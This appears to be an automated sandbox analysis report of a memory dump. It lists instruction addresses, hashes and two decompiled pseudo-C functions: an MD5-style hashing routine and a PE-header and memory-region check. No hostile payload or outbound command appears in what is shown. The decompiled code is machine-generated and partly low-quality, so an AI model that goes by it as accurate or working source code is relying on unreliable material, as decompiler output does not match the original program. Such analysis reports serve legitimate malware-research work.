0x007569de
0x007569e5
0x007569eb
0x007569ee
0x00756a0b
0x00756a17
0x00756a19
0x00756a1f
0x00756a25
0x00756a2b
0x00756a2d
0x00756a34
0x00756a3c
0x00756a42
0x00756a45
0x00756a51
0x00756a57
0x00756a62
0x00756a65
0x00756a6d
0x00756a75
0x00756a7b
0x00756a8b
0x00756a8e
0x00756a94
0x00756a9a
0x00756a9e
0x00756aaa
0x00756aac
0x00756ac0
0x00756ac7
0x00756ad9
0x00756adf
0x00756ae5
0x00756aeb
0x00756af5
0x00756af8
0x00756b04
0x00756b0a
0x00756b10
0x00756b14
0x00756b16
0x00756b19
0x00756b1e
0x00756b23
0x00756b34
0x00756b3c
0x00756b42
0x00756b44
0x00756b4a
0x00756b55
0x00756b5e
0x00756b64
0x00756b6a
0x00756b72
0x00756b7e
0x00756b82
0x00756b85
0x00756b88
0x00756b8c
0x00756b96
0x00756ba0
0x00756bb0
0x00756bb6
0x00756bbf
0x00756bc5
0x00756bcb
0x00756bcd
0x00756bd5
0x00756bde
0x00756be3
0x00756be7
0x00756bed
0x00756bf3
0x00756bf7
0x00756bfd
0x00756c03
0x00756c08
0x00756c0b
0x00756c0e
0x00756c10
0x00756c22
0x00756c25
0x00756c2a
0x00756c2d
0x00756c40
0x00756c46
0x00756c4c
0x00756c52
0x00756c58
0x00756c5e
0x00756c6a
0x00756c6d
0x00756c71
0x00756c75
0x00756c7d
0x00756c7f
0x00756c84
0x00756c93
0x00756c9b
0x00756c9e
0x00756ca6
0x00756cb2
0x00756cc2
0x00756cc8
0x00756cce
0x00756cd0
0x00756cd5
0x00756cd9
0x00756ce0
0x00756ce8
0x00756cef
0x00756cf1
0x00756cf4
0x00756d02
0x00756d08
0x00756d0a
0x00756d19
0x00756d1f
0x00756d2b
0x00756d2d
0x00756d33
0x00756d39
0x00756d3e
0x00756d44
0x00756d4c
0x00756d4e
0x00756d52
0x00756d62
0x00756d64
0x00756d6d
0x00756d73
0x00756d85
0x00756d8d
0x00756d93
0x00756d99
0x00756dab
0x00756dad
0x00756db3
0x00756db5
0x00756dba
0x00756dc0
0x00756dcc
0x00756dcf
0x00756dd9
0x00756ddf
0x00756de7
0x00756df1
0x00756df7
0x00756dfd
0x00756e07
0x00756e13
0x00756e16
0x00756e1c
0x00756e24
0x00756e28
0x00756e32
0x00756e34
0x00756e48
0x00756e4f
0x00756e5c
0x00756e62
0x00756e6a
0x00756e73
0x00756e7d
0x00756e89
0x00756e8e
0x00756e94
0x00756e9a
0x00756e9c
0x00756ea0
0x00756ea2
0x00756ea5
0x00756ea7
0x00756ebc
0x00756ec4
0x00756eca
0x00756ecc
0x00756ed2
0x00756edd
0x00756ee6
0x00756eec
0x00756ef2
0x00756efc
0x00756f08
0x00756f0a
0x00756f0d
0x00756f0f
0x00756f14
0x00756f1e
0x00756f28
0x00756f38
0x00756f3e
0x00756f47
0x00756f49
0x00756f51
0x00756f57
0x00756f5f
0x00756f61
0x00756f6a
0x00756f6d
0x00756f73
0x00756f7b
0x00756f7f
0x00756f84
0x00756f8a
0x00756f90
0x00756f93
0x00756f96
0x00756f99
0x00756fa0
0x00756fa7
0x00756fac
0x00756fb5
0x00756fc4
0x00756fce
0x00756fd4
0x00756fda
0x00756fe0
0x00756fe6
0x00756fe9
0x00756feb
0x00756ff9
0x00756ffd
0x00757005
0x00757007
0x0075700c
0x0075701b
0x00757023
0x00757026
0x0075702e
0x0075703a
0x0075704a
0x00757050
0x00757056
0x00757058
0x0075705d
0x0075705f
0x00757068
0x00757070
0x00757077
0x00757079
0x0075707c
0x0075708a
0x00757090
0x0075709b
0x007570a1
0x007570a7
0x007570ad
0x007570b3
0x007570bf
0x007570c7
0x007570c9
0x007570cb
0x007570ce
0x007570d8
0x007570de
0x007570ea
0x007570ec
0x007570f5
0x00757103
0x00757109
0x0075710f
0x00757115
0x00757121
0x00757127
0x00757133
0x00757136
0x00757138
0x0075713e
0x00757140
0x00757147
0x00757152
0x00757162
0x00757168
0x00757170
0x00757174
0x0075717a
0x00757180
0x00757186
0x0075718c
0x00757192
0x007571a2
0x007571a7
0x007571a9
0x007571b5
0x007571b7
0x007571c8
0x007571d2
0x007571e4
0x007571ea
0x007571f0
0x007571f6
0x007571fc
0x00757202
0x0075720e
0x00757218
0x0075721a
0x0075721f
0x00757221
0x00757224
0x00757227
0x0075722e
0x0075723f
0x00757247
0x00757249
0x00757253
0x0075725a
0x00757263
0x00757269
0x0075726f
0x00757275
0x0075727b
0x0075728b
0x0075728e
0x00757290
0x00757293
0x00757297
0x007572a4
0x007572ab
0x007572bb
0x007572c1
0x007572ca
0x007572ce
0x007572d7
0x007572dd
0x007572e3
0x007572e9
0x007572ef
0x007572f5
0x007572fb
0x00757301
0x00757306
0x0075730a
0x0075730e
0x00757311
0x00757313
0x00757318
0x0075731b
0x0075732d
0x00757330
0x00757335
0x00757341
0x00757347
0x00757351
0x00757357
0x0075735d
0x00757363
0x00757369
0x00757371
0x00757374
0x0075737c
0x00757380
0x00757388
0x0075738a
0x0075738f
0x00757399
0x007573a1
0x007573a7
0x007573b2
0x007573bb
0x007573c1
0x007573c7
0x007573cd
0x007573d9
0x007573dd
0x007573df
0x007573e2
0x007573eb
0x007573f3
0x007573f7
0x007573f9
0x007573fc
0x00757401
0x00757413
0x0075741e
0x00757424
0x0075742a
0x00757430
0x00757436
0x00757442
0x00757448
0x0075744a
0x00757451
0x00757453
0x00757455
0x0075745d
0x0075746d
0x0075746f
0x00757478
0x00757486
0x0075748c
0x00757493
0x0075749a
0x007574a2

Strings

:Uu, xrefs: 0075664C

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: :Uu
API String ID: 0-824088054
Opcode ID: 576148c50a230eacc7c4b7f43388edc7c04b2e82cdf65ae50e9a9ff7a9fdbbda
Instruction ID: 2b365d3175991f8ea315e2e928e74222d013efcb702860aedf1790c266b9b6f5
Opcode Fuzzy Hash: 576148c50a230eacc7c4b7f43388edc7c04b2e82cdf65ae50e9a9ff7a9fdbbda
Instruction Fuzzy Hash: 65B29976A142169FDB4CCF65C4916DAF7E1BB4C310F0A82BE9D1DDB702DA74A9808BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00752B76, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E00752B76(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x00752b79
0x00752b84
0x00752b87
0x00752b8a
0x00752b8b
0x00752ba9
0x00752bab
0x00752bae
0x00752bb1
0x00752bb1
0x00752bb4
0x00752bb4
0x00752bb7
0x00752bb7
0x00752bba
0x00752bba
0x00752bd7
0x00752bda
0x00752bf0
0x00752bf3
0x00752c0d
0x00752c10
0x00752c26
0x00752c29
0x00752c2b
0x00752c43
0x00752c46
0x00752c49
0x00752c61
0x00752c64
0x00752c7e
0x00752c81
0x00752c97
0x00752c9a
0x00752c9c
0x00752cb4
0x00752cb9
0x00752cbc
0x00752cd2
0x00752cd5
0x00752cef
0x00752cf2
0x00752d08
0x00752d0b
0x00752d0d
0x00752d28
0x00752d2b
0x00752d42
0x00752d45
0x00752d49
0x00752d62
0x00752d65
0x00752d67
0x00752d6a
0x00752d85
0x00752d88
0x00752da1
0x00752da4
0x00752db4
0x00752db7
0x00752dcf
0x00752dd2
0x00752dec
0x00752def
0x00752e07
0x00752e0a
0x00752e20
0x00752e23
0x00752e3b
0x00752e3e
0x00752e56
0x00752e59
0x00752e73
0x00752e76
0x00752e8c
0x00752e8f
0x00752ea7
0x00752eaa
0x00752ec4
0x00752ec7
0x00752edf
0x00752ee2
0x00752ef8
0x00752efb
0x00752f13
0x00752f16
0x00752f2e
0x00752f31
0x00752f43
0x00752f46
0x00752f58
0x00752f5b
0x00752f6d
0x00752f70
0x00752f74
0x00752f84
0x00752f87
0x00752f95
0x00752f98
0x00752faa
0x00752fad
0x00752fc1
0x00752fc4
0x00752fc6
0x00752fd6
0x00752fd9
0x00752feb
0x00752fee
0x00752ffc
0x00752fff
0x00753011
0x00753014
0x00753018
0x00753028
0x0075302b
0x0075303d
0x00753040
0x0075304e
0x00753051
0x00753063
0x00753066
0x00753078
0x0075307b
0x0075308f
0x00753092
0x007530a6
0x007530a9
0x007530bd
0x007530c0
0x007530d4
0x007530d7
0x007530eb
0x007530ee
0x00753102
0x00753107
0x00753119
0x0075311c
0x00753130
0x00753133
0x00753147
0x0075314a
0x00753160
0x00753163
0x00753177
0x0075317a
0x0075318c
0x0075318f
0x007531a3
0x007531a6
0x007531ba
0x007531bd
0x007531d1
0x007531da
0x007531dd
0x007531e6
0x007531ef
0x007531f7
0x007531ff
0x00753209
0x0075321e

APIs

memset.NTDLL ref: 00753212

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: c932cbf2a409a87c6291a25323f1d36c96c09ec801fe66f8d437da4467a69dd6
Instruction ID: ddf4dddb62dc9864c23a51368fab57b5a459780a4598969fe6b5e960b7cf8d78
Opcode Fuzzy Hash: c932cbf2a409a87c6291a25323f1d36c96c09ec801fe66f8d437da4467a69dd6
Instruction Fuzzy Hash: B122847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 0075B149, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075B149(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x75d318; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x75d360 = 1;
										__eflags =  *0x75d360;
										if( *0x75d360 != 0) {
											goto L60;
										}
										_t84 =  *0x75d318; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x75d360 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x75d318 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x75d320 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x75d31c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x75d320 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x75d320 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x75d360 = 1;
							__eflags =  *0x75d360;
							if( *0x75d360 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x75d320 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x75d320 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x75d360 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x75d320 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x75d318 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x75d320 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x75d320 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x0075b153
0x0075b156
0x0075b15c
0x0075b17a
0x00000000
0x0075b17a
0x0075b164
0x0075b16d
0x0075b173
0x0075b182
0x0075b185
0x0075b188
0x0075b192
0x0075b192
0x0075b194
0x0075b197
0x0075b199
0x0075b199
0x0075b19b
0x0075b19e
0x00000000
0x00000000
0x0075b1a0
0x0075b1a2
0x0075b208
0x0075b208
0x0075b366
0x00000000
0x0075b366
0x0075b1a4
0x0075b1a4
0x0075b1a8
0x0075b1aa
0x0075b1aa
0x0075b1aa
0x0075b1aa
0x0075b1ad
0x0075b1ae
0x0075b1b1
0x0075b1b1
0x0075b1b5
0x0075b1b9
0x0075b1c7
0x0075b1c7
0x0075b1cf
0x0075b1d5
0x0075b1d7
0x0075b1d9
0x0075b1e9
0x0075b1f6
0x0075b1fa
0x0075b1ff
0x0075b201
0x0075b27f
0x0075b27f
0x0075b203
0x0075b203
0x0075b203
0x0075b281
0x0075b283
0x0075b364
0x0075b364
0x00000000
0x0075b289
0x0075b289
